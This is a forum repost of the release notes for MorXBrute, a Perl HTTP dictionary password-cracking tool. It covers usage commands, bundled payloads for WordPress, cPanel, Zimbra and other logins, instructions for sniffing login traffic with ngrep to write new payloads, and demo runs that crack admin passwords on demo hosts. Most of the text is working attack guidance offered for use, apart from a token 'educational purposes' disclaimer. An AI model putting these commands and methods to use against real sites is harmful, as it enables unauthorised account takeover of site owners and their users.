MorXBrute Password Cracker 1.01

[Fi8sVrs]

Description:

MorXBrute is a customizable HTTP dictionary-based password cracking tool written in Perl.

MorXBrute comes with a few payloads for some of the most popular softwares and additionally let you add your own payload for your favorite HTTP software or website.

MorXBrute supports both GET and POST brute forcing.

MorXBrute was written for educational, demonstration and testing purposes only.

Author cannot be held responsible for any malicious use or damage.

You can redistribute it and/or modify it under the same terms as Perl itself.

Author:

Simo Ben youssef <Simo_at_morxploit_dot_com>

MorXploit Research

Version:

MorXBrute v1.01 Beta

MD5: b4ea3c6895b9996b72309cc91a5910f8

Release date:

November 08 2013

Download:

• Link 1
  
• Link 2
  

Requirements:

Perl 5 or older

Additional modules:

None

Usage:

perl MorXBrute.pl <target:port> <user> <wordlist> <payload file>
perl MorXBrute.pl localhost:80 admin password.lst payloads/wordpressv3.7.1
perl MorXBrute.pl update

Payloads:

As of version 1.01 MorXBrute includes payloads for:

• Bitrix
  
• cPanel
  
• everyone email platform
  
• Horde
  
• Moodle
  
• Wordpress
  
• Xoops
  
• Zimbra
  
• However the goal of MorXBrute is to be a customizable HTTP brute forcing tool by giving you the ability to create your own payloads and share them with others, please read below and feel free to contact me if you need help.
  

How to generate Payloads:

Generating your own payload for your target requires a little work, right now MorXBrute can’t do that for you, but I’m considering to add a payload generator in the future.

MorXBrute works by sending either a POST or GET request to the target with the login and pass and any other data as required by the target script, MorXBrute proceeds then to read the server’s response for each request.

The server’s response changes just as login parameters, but in most cases, after successful authentication, the server responds with a HTTP/1.1 302 Found and redirects the browser to a new location. In this case MorXBrute uses the regex Location: (.*) to distinguish between a successful and a failed login attempt.

In some other cases, some scripts like joomla will assign a cookie and redirects you to the administration page either way, before the script validates login cookie. This makes brute forcing slower and is not supported by MorXBrute.

First you will need a network sniffer or if you use Google Chrome you can use the built-in network sniffer in the Developer tools (CTRL + Shift + i). Personally I prefer to use ngrep which can be downloaded from:

ngrep - network grep

or apt-get install ngrep on Debian/Ubuntu and yum install ngrep

on Red Hat/Fedora/Centos

You can then run it to capture your target traffic to analyze by running:

ngrep -q -d interface -W byline host target and port 80 > target.log

ngrep -q -d wlan0 -W byline host mywordpresssite.com and port 80 > wordpress.log

At the login page, send two requests, one with valid login credentiels and second with false login credentiels. Once done go back and check your ngrep logs and gather the following (in wordpress example).

login script path:

POST /wp-login.php
Or when GET is used (not in wordpress case)
GET /someotherscript.php

posted data
log=admin&pwd=somelamepassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.testserver%2Fwp-admin%2F&testcookie=1
or log=admin&pwd=somelamepassword when GET is used (again not in word press case)
GET /someotherscript.php?log=admin&pwd=somelamepassword

on the successful login attempt log check the rest of the response headers to see if the server responded with a new location

Example:

Set-Cookie: wordpress_logged_in_b376718910d75b03e67817ec5d3badc4=admin%7C1563339904%7Cba04510cfb75c0a5094246a6f150baee; path=/; httponly.
Location: http://testserver/wp-admin/ <——– HERE
Content-Length: 0
Connection: close

On the failed login attempt log check also for the location response.

If you can’t find the location response in the failed login log then bingo that’s the server telling you that your password works, and that’s our key! Otherwise and if the server responds with the same location either way then it’s probably trying to validate the newly assigned cookie on the next step.

In some rare cases, some scripts use the main restricted area (admin panel/mailbox etc) script to process login requests in this case you can easily find the regex key by looking either at the cookie value (BITRIX_SM_LOGIN=admin in Bitrix case) or anything different in the HTML code, a welcome message (Welcome user to inbox as an example) and add it in the payload as Welcome(.*?)to

Payload file structure:

The structure is very simple, there are 4 values seperated by comma “,”

1- POST: HTTP method (could be either POST or GET)

2- login.php: the login script path

Note: this is the full path, if your script is installed in a subdirectory then you should include that too for example if your wordpress is installed in http://localhost/wordpress then you should include it in the payload (POST:wordpress/wp-login.php)

3- login parameters (login and password)

Note: $user and $pwd are used by MorXBrute and should not be changed

4- MorXploit: Cookie value, change if required by the remote login

5- Regex key

POST,login.php,login=$user&password=$pwd,MorXploit,Location:(.*)

Note: Although wordpress takes other data paremeters besides log and pwd such as redirect_to and testcookie, it only requires those first two.

Demo:

POST Method:

root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl demo.opensourcecms.com:80 admin word.lst payloads/wordpressv3.7.1

===================================================
— MorXBrute v1.0 Beta HTTP password cracking tool
— By Simo Ben youssef
— www.morxploit.com
===================================================

[*] target set to demo.opensourcecms.com:80
[*] user set to admin
[*] Wordlist set to word.lst
[*] payload set to payloads/wordpressv3.7.1

[+] Cracking …

[-] test -> Failed
[-] test123 -> Failed
[-] testtest -> Failed
[-] testest123 -> Failed
[-] qwerty -> Failed
[-] azerty -> Failed
[-] password -> Failed
[-] password123 -> Failed
[-] x3demob -> Failed
============================================================
[+] CRACKED! Your password is demo123
[+] Found at line 10 of word.lst
[+] Cracked in 6 seconds
============================================================

GET Method:

root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl x3demob.cpx3demo.com:2082 x3demob word.lst payloads/cpanelgetprov1.0

===================================================
— MorXBrute v1.0 Beta HTTP password cracking tool
— By Simo Ben youssef
— www.morxploit.com
===================================================

[*] target set to x3demob.cpx3demo.com:2082
[*] user set to x3demob
[*] Wordlist set to word.lst
[*] payload set to payloads/cpanelgetprov1.0

[+] Cracking …

[-] test -> Failed
[-] test123 -> Failed
[-] testtest -> Failed
[-] testest123 -> Failed
[-] qwerty -> Failed
[-] azerty -> Failed
[-] password -> Failed
[-] password123 -> Failed
============================================================
[+] CRACKED! Your password is x3demob
[+] Found at line 9 of word.lst
[+] Cracked in 4 seconds
============================================================

TODO:

Add SSL suport

Add a payload generator

And maybe more?

Submit your payloads:

Your contribution is needed! Please submit your payloads to simo_at_morxploit_com

Make sure to include software/service details such as name, URL and version number

Also please feel free to submit all your suggestions and bugs.

Thanks and happy MorXBruteForcing!

Source: MorXBrute HTTP Password cracking tool

Edited November 10, 2013 by Fi8sVrs